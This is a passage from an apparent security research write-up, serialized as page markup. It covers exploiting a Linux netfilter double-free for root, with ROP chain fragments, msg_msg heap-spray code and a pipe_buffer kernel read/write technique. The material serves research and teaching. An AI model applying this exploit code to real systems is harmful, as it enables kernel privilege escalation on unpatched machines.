rop\n",{"type":28,"tag":116,"props":56832,"children":56833},{"class":245,"line":796},[56834,56838,56842,56846,56850,56854,56858,56862,56867,56871],{"type":28,"tag":116,"props":56835,"children":56836},{"style":272},[56837],{"type":33,"value":55788},{"type":28,"tag":116,"props":56839,"children":56840},{"style":266},[56841],{"type":33,"value":56303},{"type":28,"tag":116,"props":56843,"children":56844},{"style":370},[56845],{"type":33,"value":50888},{"type":28,"tag":116,"props":56847,"children":56848},{"style":266},[56849],{"type":33,"value":8333},{"type":28,"tag":116,"props":56851,"children":56852},{"style":370},[56853],{"type":33,"value":373},{"type":28,"tag":116,"props":56855,"children":56856},{"style":266},[56857],{"type":33,"value":55809},{"type":28,"tag":116,"props":56859,"children":56860},{"style":370},[56861],{"type":33,"value":2268},{"type":28,"tag":116,"props":56863,"children":56864},{"style":350},[56865],{"type":33,"value":56866}," 0xffffffff81caed31",{"type":28,"tag":116,"props":56868,"children":56869},{"style":266},[56870],{"type":33,"value":48695},{"type":28,"tag":116,"props":56872,"children":56873},{"style":250},[56874],{"type":33,"value":56875}," // push rax; jmp qword ptr [rsi + 0x66];\n",{"type":28,"tag":116,"props":56877,"children":56878},{"class":245,"line":847},[56879],{"type":28,"tag":116,"props":56880,"children":56881},{"emptyLinePlaceholder":19},[56882],{"type":33,"value":1044},{"type":28,"tag":116,"props":56884,"children":56885},{"class":245,"line":898},[56886],{"type":28,"tag":116,"props":56887,"children":56888},{"style":250},[56889],{"type":33,"value":56890},"    // switch_task_namespaces(task, &init_nsproxy);\n",{"type":28,"tag":116,"props":56892,"children":56893},{"class":245,"line":907},[56894,56898,56902,56906,56910,56914,56918,56922,56926,56930],{"type":28,"tag":116,"props":56895,"children":56896},{"style":272},[56897],{"type":33,"value":55788},{"type":28,"tag":116,"props":56899,"children":56900},{"style":266},[56901],{"type":33,"value":56303},{"type":28,"tag":116,"props":56903,"children":56904},{"style":370},[56905],{"type":33,"value":50888},{"type":28,"tag":116,"props":56907,"children":56908},{"style":266},[56909],{"type":33,"value":8333},{"type":28,"tag":116,"props":56911,"children":56912},{"style":370},[56913],{"type":33,"value":373},{"type":28,"tag":116,"props":56915,"children":56916},{"style":266},[56917],{"type":33,"value":55809},{"type":28,"tag":116,"props":56919,"children":56920},{"style":370},[56921],{"type":33,"value":2268},{"type":28,"tag":116,"props":56923,"children":56924},{"style":350},[56925],{"type":33,"value":56766},{"type":28,"tag":116,"props":56927,"children":56928},{"style":266},[56929],{"type":33,"value":48695},{"type":28,"tag":116,"props":56931,"children":56932},{"style":250},[56933],{"type":33,"value":56775},{"type":28,"tag":116,"props":56935,"children":56936},{"class":245,"line":981},[56937,56941,56945,56949,56953,56957,56961,56965],{"type":28,"tag":116,"props":56938,"children":56939},{"style":272},[56940],{"type":33,"value":55788},{"type":28,"tag":116,"props":56942,"children":56943},{"style":266},[56944],{"type":33,"value":56303},{"type":28,"tag":116,"props":56946,"children":56947},{"style":370},[56948],{"type":33,"value":50888},{"type":28,"tag":116,"props":56950,"children":56951},{"style":266},[56952],{"type":33,"value":8333},{"type":28,"tag":116,"props":56954,"children":56955},{"style":370},[56956],{"type":33,"value":373},{"type":28,"tag":116,"props":56958,"children":56959},{"style":266},[56960],{"type":33,"value":55809},{"type":28,"tag":116,"props":56962,"children":56963},{"style":370},[56964],{"type":33,"value":2268},{"type":28,"tag":116,"props":56966,"children":56967},{"style":266},[56968],{"type":33,"value":56969}," INIT_NSPROXY;\n",{"type":28,"tag":116,"props":56971,"children":56972},{"class":245,"line":1011},[56973,56977,56981,56985,56989,56993,56997,57001],{"type":28,"tag":116,"props":56974,"children":56975},{"style":272},[56976],{"type":33,"value":55788},{"type":28,"tag":116,"props":56978,"children":56979},{"style":266},[56980],{"type":33,"value":56303},{"type":28,"tag":116,"props":56982,"children":56983},{"style":370},[56984],{"type":33,"value":50888},{"type":28,"tag":116,"props":56986,"children":56987},{"style":266},[56988],{"type":33,"value":8333},{"type":28,"tag":116,"props":56990,"children":56991},{"style":370},[56992],{"type":33,"value":373},{"type":28,"tag":116,"props":56994,"children":56995},{"style":266},[56996],{"type":33,"value":55809},{"type":28,"tag":116,"props":56998,"children":56999},{"style":370},[57000],{"type":33,"value":2268},{"type":28,"tag":116,"props":57002,"children":57003},{"style":266},[57004],{"type":33,"value":57005}," SWITCH_TASK_NAMESPACES;\n",{"type":28,"tag":116,"props":57007,"children":57008},{"class":245,"line":1029},[57009],{"type":28,"tag":116,"props":57010,"children":57011},{"style":266},[57012],{"type":33,"value":9986},{"type":28,"tag":75,"props":57014,"children":57016},{"id":57015},"grabbing-the-kernelctf-flag",[57017],{"type":33,"value":57018},"Grabbing the kernelCTF flag",{"type":28,"tag":29,"props":57020,"children":57021},{},[57022,57026,57028,57035],{"type":28,"tag":206,"props":57023,"children":57025},{"alt":50198,"src":57024},"/posts/netfilter-universal-root-1-day/flag.png",[],{"type":33,"value":57027},"\nYou can find the kernelCTF exploit in our ",{"type":28,"tag":87,"props":57029,"children":57032},{"href":57030,"rel":57031},"https://github.com/otter-sec/OtterRoot/blob/master/kernelctf/exploit.c",[91],[57033],{"type":33,"value":57034},"GitHub",{"type":33,"value":141},{"type":28,"tag":63,"props":57037,"children":57039},{"id":57038},"universal-exploit",[57040],{"type":33,"value":57041},"Universal exploit",{"type":28,"tag":29,"props":57043,"children":57044},{},[57045],{"type":33,"value":57046},"After exploiting KernelCTF, I decided to use this vulnerability to craft a universal exploit (one that works stably regardless of the target without needing to be modified). I took a different approach to avoid some compatibility and reliability pitfalls, the biggest ones being ROP and anything else that relies on kernel data offsets because those change from build to build. It's not uncommon to compile a list of gadgets for the different builds but it makes more sense just to avoid the trouble entirely.",{"type":28,"tag":75,"props":57048,"children":57050},{"id":57049},"pivot-capability-using-msg_msg-mlistnext-pointer",[57051],{"type":33,"value":57052},"Pivot capability using msg_msg->mlist.next pointer",{"type":28,"tag":29,"props":57054,"children":57055},{},[57056,57058,57064,57066,57071,57073,57079],{"type":33,"value":57057},"Using the double-free vulnerability we can overlap a ",{"type":28,"tag":98,"props":57059,"children":57061},{"className":57060},[],[57062],{"type":33,"value":57063},"msg_msg",{"type":33,"value":57065}," object with with ",{"type":28,"tag":98,"props":57067,"children":57069},{"className":57068},[],[57070],{"type":33,"value":54717},{"type":33,"value":57072}," and control the ",{"type":28,"tag":98,"props":57074,"children":57076},{"className":57075},[],[57077],{"type":33,"value":57078},"m_list.next",{"type":33,"value":57080}," pointer.",{"type":28,"tag":234,"props":57082,"children":57084},{"className":28765,"code":57083,"language":28767,"meta":7,"style":7},"/* one msg_msg structure for each message */\nstruct msg_msg {\n struct list_head m_list;\n long m_type;\n size_t m_ts;  /* message text size */\n struct msg_msgseg *next;\n void *security;\n /* the actual message follows immediately */\n};\n[...]\nstruct list_head {\n struct list_head *next, *prev;\n};\n",[57085],{"type":28,"tag":98,"props":57086,"children":57087},{"__ignoreMap":7},[57088,57096,57112,57133,57146,57164,57189,57205,57213,57220,57227,57235,57267],{"type":28,"tag":116,"props":57089,"children":57090},{"class":245,"line":246},[57091],{"type":28,"tag":116,"props":57092,"children":57093},{"style":250},[57094],{"type":33,"value":57095},"/* one msg_msg structure for each message */\n",{"type":28,"tag":116,"props":57097,"children":57098},{"class":245,"line":256},[57099,57103,57108],{"type":28,"tag":116,"props":57100,"children":57101},{"style":376},[57102],{"type":33,"value":9069},{"type":28,"tag":116,"props":57104,"children":57105},{"style":339},[57106],{"type":33,"value":57107}," msg_msg",{"type":28,"tag":116,"props":57109,"children":57110},{"style":266},[57111],{"type":33,"value":1291},{"type":28,"tag":116,"props":57113,"children":57114},{"class":245,"line":293},[57115,57119,57124,57129],{"type":28,"tag":116,"props":57116,"children":57117},{"style":376},[57118],{"type":33,"value":20814},{"type":28,"tag":116,"props":57120,"children":57121},{"style":339},[57122],{"type":33,"value":57123}," list_head",{"type":28,"tag":116,"props":57125,"children":57126},{"style":272},[57127],{"type":33,"value":57128}," m_list",{"type":28,"tag":116,"props":57130,"children":57131},{"style":266},[57132],{"type":33,"value":384},{"type":28,"tag":116,"props":57134,"children":57135},{"class":245,"line":361},[57136,57141],{"type":28,"tag":116,"props":57137,"children":57138},{"style":376},[57139],{"type":33,"value":57140}," long",{"type":28,"tag":116,"props":57142,"children":57143},{"style":266},[57144],{"type":33,"value":57145}," m_type;\n",{"type":28,"tag":116,"props":57147,"children":57148},{"class":245,"line":387},[57149,57154,57159],{"type":28,"tag":116,"props":57150,"children":57151},{"style":376},[57152],{"type":33,"value":57153}," size_t",{"type":28,"tag":116,"props":57155,"children":57156},{"style":266},[57157],{"type":33,"value":57158}," m_ts;",{"type":28,"tag":116,"props":57160,"children":57161},{"style":250},[57162],{"type":33,"value":57163},"  /* message text size */\n",{"type":28,"tag":116,"props":57165,"children":57166},{"class":245,"line":400},[57167,57171,57176,57180,57185],{"type":28,"tag":116,"props":57168,"children":57169},{"style":376},[57170],{"type":33,"value":20814},{"type":28,"tag":116,"props":57172,"children":57173},{"style":339},[57174],{"type":33,"value":57175}," msg_msgseg",{"type":28,"tag":116,"props":57177,"children":57178},{"style":376},[57179],{"type":33,"value":9484},{"type":28,"tag":116,"props":57181,"children":57182},{"style":272},[57183],{"type":33,"value":57184},"next",{"type":28,"tag":116,"props":57186,"children":57187},{"style":266},[57188],{"type":33,"value":384},{"type":28,"tag":116,"props":57190,"children":57191},{"class":245,"line":614},[57192,57196,57200],{"type":28,"tag":116,"props":57193,"children":57194},{"style":376},[57195],{"type":33,"value":2169},{"type":28,"tag":116,"props":57197,"children":57198},{"style":370},[57199],{"type":33,"value":9484},{"type":28,"tag":116,"props":57201,"children":57202},{"style":266},[57203],{"type":33,"value":57204},"security;\n",{"type":28,"tag":116,"props":57206,"children":57207},{"class":245,"line":631},[57208],{"type":28,"tag":116,"props":57209,"children":57210},{"style":250},[57211],{"type":33,"value":57212}," /* the actual message follows immediately */\n",{"type":28,"tag":116,"props":57214,"children":57215},{"class":245,"line":665},[57216],{"type":28,"tag":116,"props":57217,"children":57218},{"style":266},[57219],{"type":33,"value":16239},{"type":28,"tag":116,"props":57221,"children":57222},{"class":245,"line":713},[57223],{"type":28,"tag":116,"props":57224,"children":57225},{"style":266},[57226],{"type":33,"value":9986},{"type":28,"tag":116,"props":57228,"children":57229},{"class":245,"line":750},[57230],{"type":28,"tag":116,"props":57231,"children":57232},{"style":266},[57233],{"type":33,"value":57234},"struct list_head {\n",{"type":28,"tag":116,"props":57236,"children":57237},{"class":245,"line":779},[57238,57242,57246,57250,57254,57258,57262],{"type":28,"tag":116,"props":57239,"children":57240},{"style":376},[57241],{"type":33,"value":20814},{"type":28,"tag":116,"props":57243,"children":57244},{"style":339},[57245],{"type":33,"value":57123},{"type":28,"tag":116,"props":57247,"children":57248},{"style":376},[57249],{"type":33,"value":9484},{"type":28,"tag":116,"props":57251,"children":57252},{"style":272},[57253],{"type":33,"value":57184},{"type":28,"tag":116,"props":57255,"children":57256},{"style":266},[57257],{"type":33,"value":825},{"type":28,"tag":116,"props":57259,"children":57260},{"style":370},[57261],{"type":33,"value":4240},{"type":28,"tag":116,"props":57263,"children":57264},{"style":266},[57265],{"type":33,"value":57266},"prev;\n",{"type":28,"tag":116,"props":57268,"children":57269},{"class":245,"line":796},[57270],{"type":28,"tag":116,"props":57271,"children":57272},{"style":266},[57273],{"type":33,"value":16239},{"type":28,"tag":29,"props":57275,"children":57276},{},[57277,57279,57285,57287,57292],{"type":33,"value":57278},"This is particularly interesting if we send messages of different sizes on the same queue, making the ",{"type":28,"tag":98,"props":57280,"children":57282},{"className":57281},[],[57283],{"type":33,"value":57284},"mlist.next",{"type":33,"value":57286}," pointer of a message that lives in one cache point into a different cache. So, by spraying ",{"type":28,"tag":98,"props":57288,"children":57290},{"className":57289},[],[57291],{"type":33,"value":57063},{"type":33,"value":57293}," in kmalloc-cg-256 with a secondary message in each queue living in kmalloc-cg-1k.",{"type":28,"tag":29,"props":57295,"children":57296},{},[57297,57299,57304,57306],{"type":33,"value":57298},"By incrementing the next pointer of our controllable ",{"type":28,"tag":98,"props":57300,"children":57302},{"className":57301},[],[57303],{"type":33,"value":57063},{"type":33,"value":57305}," by 256, we are able to make it point to the different secondary message that is already referenced by a different primary message, creating a duplicated reference. We allow an easy way of pivoting our double-free capabilities to other caches and attacking a greater variety of objects.\n",{"type":28,"tag":206,"props":57307,"children":57309},{"alt":50198,"src":57308},"/posts/netfilter-universal-root-1-day/msg-msg.png",[],{"type":28,"tag":234,"props":57311,"children":57313},{"className":28765,"code":57312,"language":28767,"meta":7,"style":7},"[...]\n    // Spray msg_msg in kmalloc-256 and kmalloc-1k\n    msg_t *msg = calloc(1, sizeof(msg_t) + 0xe8 - 48);\n    int qid[SPRAY];\n    for (int i = 0; i \u003C SPRAY; i++)\n    {\n        qid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n        if (qid[i] \u003C 0)\n        {\n            perror(\"[-] msgget\");\n        }\n        *(uint32_t *)msg->mtext = i;\n        *(uint64_t *)&msg->mtext[8] = 0xdeadbeefcafebabe;\n        msg->mtype = MTYPE_PRIMARY;\n        msgsnd(qid[i], msg, 0xe8 - 48, 0);\n        msg->mtype = MTYPE_SECONDARY;\n        msgsnd(qid[i], msg, 1024 - 48, 0);\n    }\n    // Prepare evil msg\n    int evilqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);\n    if (evilqid \u003C 0)\n    {\n        perror(\"[-] msgget\");\n    }\n[...] // trigger double-free in kmalloc-256\n",[57314],{"type":28,"tag":98,"props":57315,"children":57316},{"__ignoreMap":7},[57317,57324,57332,57358,57375,57423,57430,57470,57502,57509,57530,57537,57583,57647,57673,57719,57743,57787,57794,57802,57838,57862,57869,57889,57896],{"type":28,"tag":116,"props":57318,"children":57319},{"class":245,"line":246},[57320],{"type":28,"tag":116,"props":57321,"children":57322},{"style":266},[57323],{"type":33,"value":9986},{"type":28,"tag":116,"props":57325,"children":57326},{"class":245,"line":256},[57327],{"type":28,"tag":116,"props":57328,"children":57329},{"style":266},[57330],{"type":33,"value":57331},"    // Spray msg_msg in kmalloc-256 and kmalloc-1k\n",{"type":28,"tag":116,"props":57333,"children":57334},{"class":245,"line":293},[57335,57340,57344,57348,57353],{"type":28,"tag":116,"props":57336,"children":57337},{"style":266},[57338],{"type":33,"value":57339},"    msg_t *msg = calloc(1, ",{"type":28,"tag":116,"props":57341,"children":57342},{"style":339},[57343],{"type":33,"value":54946},{"type":28,"tag":116,"props":57345,"children":57346},{"style":266},[57347],{"type":33,"value":313},{"type":28,"tag":116,"props":57349,"children":57350},{"style":339},[57351],{"type":33,"value":57352},"msg_t",{"type":28,"tag":116,"props":57354,"children":57355},{"style":266},[57356],{"type":33,"value":57357},") + 0xe8 - 48);\n",{"type":28,"tag":116,"props":57359,"children":57360},{"class":245,"line":361},[57361,57365,57370],{"type":28,"tag":116,"props":57362,"children":57363},{"style":376},[57364],{"type":33,"value":18740},{"type":28,"tag":116,"props":57366,"children":57367},{"style":272},[57368],{"type":33,"value":57369}," qid",{"type":28,"tag":116,"props":57371,"children":57372},{"style":266},[57373],{"type":33,"value":57374},"[SPRAY];\n",{"type":28,"tag":116,"props":57376,"children":57377},{"class":245,"line":387},[57378,57382,57386,57390,57394,57398,57402,57406,57410,57415,57419],{"type":28,"tag":116,"props":57379,"children":57380},{"style":260},[57381],{"type":33,"value":2703},{"type":28,"tag":116,"props":57383,"children":57384},{"style":266},[57385],{"type":33,"value":269},{"type":28,"tag":116,"props":57387,"children":57388},{"style":376},[57389],{"type":33,"value":18710},{"type":28,"tag":116,"props":57391,"children":57392},{"style":266},[57393],{"type":33,"value":54162},{"type":28,"tag":116,"props":57395,"children":57396},{"style":370},[57397],{"type":33,"value":373},{"type":28,"tag":116,"props":57399,"children":57400},{"style":350},[57401],{"type":33,"value":2718},{"type":28,"tag":116,"props":57403,"children":57404},{"style":266},[57405],{"type":33,"value":50852},{"type":28,"tag":116,"props":57407,"children":57408},{"style":370},[57409],{"type":33,"value":514},{"type":28,"tag":116,"props":57411,"children":57412},{"style":266},[57413],{"type":33,"value":57414}," SPRAY; i",{"type":28,"tag":116,"props":57416,"children":57417},{"style":370},[57418],{"type":33,"value":50888},{"type":28,"tag":116,"props":57420,"children":57421},{"style":266},[57422],{"type":33,"value":2830},{"type":28,"tag":116,"props":57424,"children":57425},{"class":245,"line":400},[57426],{"type":28,"tag":116,"props":57427,"children":57428},{"style":266},[57429],{"type":33,"value":28842},{"type":28,"tag":116,"props":57431,"children":57432},{"class":245,"line":614},[57433,57438,57442,57446,57451,57456,57461,57465],{"type":28,"tag":116,"props":57434,"children":57435},{"style":272},[57436],{"type":33,"value":57437},"        qid",{"type":28,"tag":116,"props":57439,"children":57440},{"style":266},[57441],{"type":33,"value":54214},{"type":28,"tag":116,"props":57443,"children":57444},{"style":370},[57445],{"type":33,"value":373},{"type":28,"tag":116,"props":57447,"children":57448},{"style":282},[57449],{"type":33,"value":57450}," msgget",{"type":28,"tag":116,"props":57452,"children":57453},{"style":266},[57454],{"type":33,"value":57455},"(IPC_PRIVATE, ",{"type":28,"tag":116,"props":57457,"children":57458},{"style":350},[57459],{"type":33,"value":57460},"0666",{"type":28,"tag":116,"props":57462,"children":57463},{"style":370},[57464],{"type":33,"value":3938},{"type":28,"tag":116,"props":57466,"children":57467},{"style":266},[57468],{"type":33,"value":57469}," IPC_CREAT);\n",{"type":28,"tag":116,"props":57471,"children":57472},{"class":245,"line":631},[57473,57477,57481,57486,57490,57494,57498],{"type":28,"tag":116,"props":57474,"children":57475},{"style":260},[57476],{"type":33,"value":2943},{"type":28,"tag":116,"props":57478,"children":57479},{"style":266},[57480],{"type":33,"value":269},{"type":28,"tag":116,"props":57482,"children":57483},{"style":272},[57484],{"type":33,"value":57485},"qid",{"type":28,"tag":116,"props":57487,"children":57488},{"style":266},[57489],{"type":33,"value":54214},{"type":28,"tag":116,"props":57491,"children":57492},{"style":370},[57493],{"type":33,"value":514},{"type":28,"tag":116,"props":57495,"children":57496},{"style":350},[57497],{"type":33,"value":2718},{"type":28,"tag":116,"props":57499,"children":57500},{"style":266},[57501],{"type":33,"value":2830},{"type":28,"tag":116,"props":57503,"children":57504},{"class":245,"line":665},[57505],{"type":28,"tag":116,"props":57506,"children":57507},{"style":266},[57508],{"type":33,"value":31308},{"type":28,"tag":116,"props":57510,"children":57511},{"class":245,"line":713},[57512,57517,57521,57526],{"type":28,"tag":116,"props":57513,"children":57514},{"style":282},[57515],{"type":33,"value":57516},"            perror",{"type":28,"tag":116,"props":57518,"children":57519},{"style":266},[57520],{"type":33,"value":313},{"type":28,"tag":116,"props":57522,"children":57523},{"style":563},[57524],{"type":33,"value":57525},"\"[-] msgget\"",{"type":28,"tag":116,"props":57527,"children":57528},{"style":266},[57529],{"type":33,"value":895},{"type":28,"tag":116,"props":57531,"children":57532},{"class":245,"line":750},[57533],{"type":28,"tag":116,"props":57534,"children":57535},{"style":266},[57536],{"type":33,"value":1954},{"type":28,"tag":116,"props":57538,"children":57539},{"class":245,"line":779},[57540,57544,57548,57553,57557,57561,57565,57569,57574,57578],{"type":28,"tag":116,"props":57541,"children":57542},{"style":370},[57543],{"type":33,"value":7423},{"type":28,"tag":116,"props":57545,"children":57546},{"style":266},[57547],{"type":33,"value":313},{"type":28,"tag":116,"props":57549,"children":57550},{"style":376},[57551],{"type":33,"value":57552},"uint32_t",{"type":28,"tag":116,"props":57554,"children":57555},{"style":370},[57556],{"type":33,"value":9484},{"type":28,"tag":116,"props":57558,"children":57559},{"style":266},[57560],{"type":33,"value":1829},{"type":28,"tag":116,"props":57562,"children":57563},{"style":272},[57564],{"type":33,"value":939},{"type":28,"tag":116,"props":57566,"children":57567},{"style":266},[57568],{"type":33,"value":13423},{"type":28,"tag":116,"props":57570,"children":57571},{"style":272},[57572],{"type":33,"value":57573},"mtext",{"type":28,"tag":116,"props":57575,"children":57576},{"style":370},[57577],{"type":33,"value":2226},{"type":28,"tag":116,"props":57579,"children":57580},{"style":266},[57581],{"type":33,"value":57582}," i;\n",{"type":28,"tag":116,"props":57584,"children":57585},{"class":245,"line":796},[57586,57590,57594,57598,57602,57606,57610,57614,57618,57622,57626,57630,57634,57638,57643],{"type":28,"tag":116,"props":57587,"children":57588},{"style":370},[57589],{"type":33,"value":7423},{"type":28,"tag":116,"props":57591,"children":57592},{"style":266},[57593],{"type":33,"value":313},{"type":28,"tag":116,"props":57595,"children":57596},{"style":376},[57597],{"type":33,"value":55253},{"type":28,"tag":116,"props":57599,"children":57600},{"style":370},[57601],{"type":33,"value":9484},{"type":28,"tag":116,"props":57603,"children":57604},{"style":266},[57605],{"type":33,"value":1829},{"type":28,"tag":116,"props":57607,"children":57608},{"style":370},[57609],{"type":33,"value":2780},{"type":28,"tag":116,"props":57611,"children":57612},{"style":272},[57613],{"type":33,"value":939},{"type":28,"tag":116,"props":57615,"children":57616},{"style":266},[57617],{"type":33,"value":13423},{"type":28,"tag":116,"props":57619,"children":57620},{"style":272},[57621],{"type":33,"value":57573},{"type":28,"tag":116,"props":57623,"children":57624},{"style":266},[57625],{"type":33,"value":347},{"type":28,"tag":116,"props":57627,"children":57628},{"style":350},[57629],{"type":33,"value":3745},{"type":28,"tag":116,"props":57631,"children":57632},{"style":266},[57633],{"type":33,"value":8333},{"type":28,"tag":116,"props":57635,"children":57636},{"style":370},[57637],{"type":33,"value":373},{"type":28,"tag":116,"props":57639,"children":57640},{"style":350},[57641],{"type":33,"value":57642}," 0xdeadbeefcafebabe",{"type":28,"tag":116,"props":57644,"children":57645},{"style":266},[57646],{"type":33,"value":384},{"type":28,"tag":116,"props":57648,"children":57649},{"class":245,"line":847},[57650,57655,57659,57664,57668],{"type":28,"tag":116,"props":57651,"children":57652},{"style":272},[57653],{"type":33,"value":57654},"        msg",{"type":28,"tag":116,"props":57656,"children":57657},{"style":266},[57658],{"type":33,"value":13423},{"type":28,"tag":116,"props":57660,"children":57661},{"style":272},[57662],{"type":33,"value":57663},"mtype",{"type":28,"tag":116,"props":57665,"children":57666},{"style":370},[57667],{"type":33,"value":2226},{"type":28,"tag":116,"props":57669,"children":57670},{"style":266},[57671],{"type":33,"value":57672}," MTYPE_PRIMARY;\n",{"type":28,"tag":116,"props":57674,"children":57675},{"class":245,"line":898},[57676,57681,57685,57689,57694,57698,57702,57707,57711,57715],{"type":28,"tag":116,"props":57677,"children":57678},{"style":282},[57679],{"type":33,"value":57680},"        msgsnd",{"type":28,"tag":116,"props":57682,"children":57683},{"style":266},[57684],{"type":33,"value":313},{"type":28,"tag":116,"props":57686,"children":57687},{"style":272},[57688],{"type":33,"value":57485},{"type":28,"tag":116,"props":57690,"children":57691},{"style":266},[57692],{"type":33,"value":57693},"[i], msg, ",{"type":28,"tag":116,"props":57695,"children":57696},{"style":350},[57697],{"type":33,"value":55590},{"type":28,"tag":116,"props":57699,"children":57700},{"style":370},[57701],{"type":33,"value":50874},{"type":28,"tag":116,"props":57703,"children":57704},{"style":350},[57705],{"type":33,"value":57706}," 48",{"type":28,"tag":116,"props":57708,"children":57709},{"style":266},[57710],{"type":33,"value":825},{"type":28,"tag":116,"props":57712,"children":57713},{"style":350},[57714],{"type":33,"value":353},{"type":28,"tag":116,"props":57716,"children":57717},{"style":266},[57718],{"type":33,"value":895},{"type":28,"tag":116,"props":57720,"children":57721},{"class":245,"line":907},[57722,57726,57730,57734,57738],{"type":28,"tag":116,"props":57723,"children":57724},{"style":272},[57725],{"type":33,"value":57654},{"type":28,"tag":116,"props":57727,"children":57728},{"style":266},[57729],{"type":33,"value":13423},{"type":28,"tag":116,"props":57731,"children":57732},{"style":272},[57733],{"type":33,"value":57663},{"type":28,"tag":116,"props":57735,"children":57736},{"style":370},[57737],{"type":33,"value":2226},{"type":28,"tag":116,"props":57739,"children":57740},{"style":266},[57741],{"type":33,"value":57742}," MTYPE_SECONDARY;\n",{"type":28,"tag":116,"props":57744,"children":57745},{"class":245,"line":981},[57746,57750,57754,57758,57762,57767,57771,57775,57779,57783],{"type":28,"tag":116,"props":57747,"children":57748},{"style":282},[57749],{"type":33,"value":57680},{"type":28,"tag":116,"props":57751,"children":57752},{"style":266},[57753],{"type":33,"value":313},{"type":28,"tag":116,"props":57755,"children":57756},{"style":272},[57757],{"type":33,"value":57485},{"type":28,"tag":116,"props":57759,"children":57760},{"style":266},[57761],{"type":33,"value":57693},{"type":28,"tag":116,"props":57763,"children":57764},{"style":350},[57765],{"type":33,"value":57766},"1024",{"type":28,"tag":116,"props":57768,"children":57769},{"style":370},[57770],{"type":33,"value":50874},{"type":28,"tag":116,"props":57772,"children":57773},{"style":350},[57774],{"type":33,"value":57706},{"type":28,"tag":116,"props":57776,"children":57777},{"style":266},[57778],{"type":33,"value":825},{"type":28,"tag":116,"props":57780,"children":57781},{"style":350},[57782],{"type":33,"value":353},{"type":28,"tag":116,"props":57784,"children":57785},{"style":266},[57786],{"type":33,"value":895},{"type":28,"tag":116,"props":57788,"children":57789},{"class":245,"line":1011},[57790],{"type":28,"tag":116,"props":57791,"children":57792},{"style":266},[57793],{"type":33,"value":3025},{"type":28,"tag":116,"props":57795,"children":57796},{"class":245,"line":1029},[57797],{"type":28,"tag":116,"props":57798,"children":57799},{"style":250},[57800],{"type":33,"value":57801},"    // Prepare evil msg\n",{"type":28,"tag":116,"props":57803,"children":57804},{"class":245,"line":1038},[57805,57809,57814,57818,57822,57826,57830,57834],{"type":28,"tag":116,"props":57806,"children":57807},{"style":376},[57808],{"type":33,"value":18740},{"type":28,"tag":116,"props":57810,"children":57811},{"style":266},[57812],{"type":33,"value":57813}," evilqid ",{"type":28,"tag":116,"props":57815,"children":57816},{"style":370},[57817],{"type":33,"value":373},{"type":28,"tag":116,"props":57819,"children":57820},{"style":282},[57821],{"type":33,"value":57450},{"type":28,"tag":116,"props":57823,"children":57824},{"style":266},[57825],{"type":33,"value":57455},{"type":28,"tag":116,"props":57827,"children":57828},{"style":350},[57829],{"type":33,"value":57460},{"type":28,"tag":116,"props":57831,"children":57832},{"style":370},[57833],{"type":33,"value":3938},{"type":28,"tag":116,"props":57835,"children":57836},{"style":266},[57837],{"type":33,"value":57469},{"type":28,"tag":116,"props":57839,"children":57840},{"class":245,"line":1047},[57841,57845,57850,57854,57858],{"type":28,"tag":116,"props":57842,"children":57843},{"style":260},[57844],{"type":33,"value":11947},{"type":28,"tag":116,"props":57846,"children":57847},{"style":266},[57848],{"type":33,"value":57849}," (evilqid ",{"type":28,"tag":116,"props":57851,"children":57852},{"style":370},[57853],{"type":33,"value":514},{"type":28,"tag":116,"props":57855,"children":57856},{"style":350},[57857],{"type":33,"value":2718},{"type":28,"tag":116,"props":57859,"children":57860},{"style":266},[57861],{"type":33,"value":2830},{"type":28,"tag":116,"props":57863,"children":57864},{"class":245,"line":1071},[57865],{"type":28,"tag":116,"props":57866,"children":57867},{"style":266},[57868],{"type":33,"value":28842},{"type":28,"tag":116,"props":57870,"children":57871},{"class":245,"line":1137},[57872,57877,57881,57885],{"type":28,"tag":116,"props":57873,"children":57874},{"style":282},[57875],{"type":33,"value":57876},"        perror",{"type":28,"tag":116,"props":57878,"children":57879},{"style":266},[57880],{"type":33,"value":313},{"type":28,"tag":116,"props":57882,"children":57883},{"style":563},[57884],{"type":33,"value":57525},{"type":28,"tag":116,"props":57886,"children":57887},{"style":266},[57888],{"type":33,"value":895},{"type":28,"tag":116,"props":57890,"children":57891},{"class":245,"line":1181},[57892],{"type":28,"tag":116,"props":57893,"children":57894},{"style":266},[57895],{"type":33,"value":3025},{"type":28,"tag":116,"props":57897,"children":57898},{"class":245,"line":1212},[57899],{"type":28,"tag":116,"props":57900,"children":57901},{"style":266},[57902],{"type":33,"value":57903},"[...] // trigger double-free in kmalloc-256\n",{"type":28,"tag":75,"props":57905,"children":57907},{"id":57906},"using-pipe_buffer-page-pointer-for-physical-readwrite",[57908],{"type":33,"value":57909},"Using pipe_buffer->page pointer for physical read/write",{"type":28,"tag":29,"props":57911,"children":57912},{},[57913,57915,57921,57922,57928,57929,57935,57937,57943],{"type":33,"value":57914},"Now that we have increased the reach of our double-free, it's probably a good idea to go to ",{"type":28,"tag":98,"props":57916,"children":57918},{"className":57917},[],[57919],{"type":33,"value":57920},"kmalloc-1k",{"type":33,"value":10659},{"type":28,"tag":98,"props":57923,"children":57925},{"className":57924},[],[57926],{"type":33,"value":57927},"overlap pipe_buffer",{"type":33,"value":21167},{"type":28,"tag":98,"props":57930,"children":57932},{"className":57931},[],[57933],{"type":33,"value":57934},"skbuf",{"type":33,"value":57936}," data to control the ",{"type":28,"tag":98,"props":57938,"children":57940},{"className":57939},[],[57941],{"type":33,"value":57942},"page",{"type":33,"value":57944}," field.",{"type":28,"tag":29,"props":57946,"children":57947},{},[57948,57949,57954,57956,57962,57964],{"type":33,"value":16275},{"type":28,"tag":98,"props":57950,"children":57952},{"className":57951},[],[57953],{"type":33,"value":57942},{"type":33,"value":57955}," field is a pointer into ",{"type":28,"tag":98,"props":57957,"children":57959},{"className":57958},[],[57960],{"type":33,"value":57961},"vmemmap_base",{"type":33,"value":57963},", which contains all page structs used to track memory mapped to the kernel. This pointer is used to fetch the address of the data associated with a given pipe when reading/writing.\n",{"type":28,"tag":206,"props":57965,"children":57967},{"alt":50198,"src":57966},"/posts/netfilter-universal-root-1-day/pipe-buffer.png",[],{"type":28,"tag":29,"props":57969,"children":57970},{},[57971,57973,57978],{"type":33,"value":57972},"This now allows us to navigate the ",{"type":28,"tag":98,"props":57974,"children":57976},{"className":57975},[],[57977],{"type":33,"value":57961},{"type":33,"value":57979}," array and use our pipe as an interface to read/write kernel memory 